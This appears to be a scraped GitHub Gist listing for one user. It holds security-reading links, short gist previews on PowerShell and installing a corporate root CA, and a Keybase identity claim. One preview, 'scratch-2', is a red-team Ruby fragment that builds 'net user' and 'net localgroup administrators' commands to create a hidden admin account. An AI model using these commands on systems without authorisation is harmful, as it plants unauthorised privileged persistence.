- https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/about-this-book
- https://www.fortynorthsecurity.com/mass-powershell-and-wmimplant/
- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/
- https://rlevchenko.com/2017/03/17/how-easy-is-it-to-track-group-policy-changes-using-the-event-log/
- http://www.redblue.team/2015/09/spotting-adversary-with-windows-event.html
- https://blogs.technet.microsoft.com/ashleymcglone/2015/03/20/deploy-active-directory-with-powershell-dsc-a-k-a-dsc-promo/
- https://github.com/JacksonVD/PwnedPasswordsDLL
- https://stealthpuppy.com/deploy-enterprise-root-certificate-authority/
- https://blog.flux7.com/how-to-organize-infrastructure-as-code-in-your-source-code-repository
- https://logrhythm.com/blog/detecting-lateral-movement-from-pass-the-hash-attacks/
chandanchowdhury
/ scratch-2
Created
October 26, 2018 09:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #add_admin_windows(client, redteam, password) | |
| #add_admin_linux(client, redteam, password) | |
| def add_admin_windows(session, username, userpasswd) | |
| print_status("adding admin user: #{username}") | |
| # Ref: https://www.windows-commandline.com/add-user-from-command-line/ | |
| add_user_cmd='cmd.exe /c net user #{username} #{userpasswd} /ADD /PASSWORDCHG:NO' | |
| make_user_admin_cmd='cmd.exe /c net localgroup administrators #{username} /add' |
chandanchowdhury
/ Powershell_snippets.md
Last active
August 7, 2018 20:07
chandanchowdhury
/ self_signed_certificate_in_certificate_chain.md
Last active
July 3, 2018 15:47
While working from inside company network, which uses self-signed certificate to monitor SSL traffic, various programs will start failing.
Here is list of them and how to resolve the issue.
Extract the Root CA and install on the host.
chandanchowdhury
/ keybase.md
Created
March 20, 2018 05:11
I hereby claim:
- I am chandanchowdhury on github.
- I am i_virus (https://keybase.io/i_virus) on keybase.
- I have a public key whose fingerprint is 8624 5273 7827 9AC4 E1D9 B257 1F56 4FEC 8D26 4684
To claim this, I am signing this object: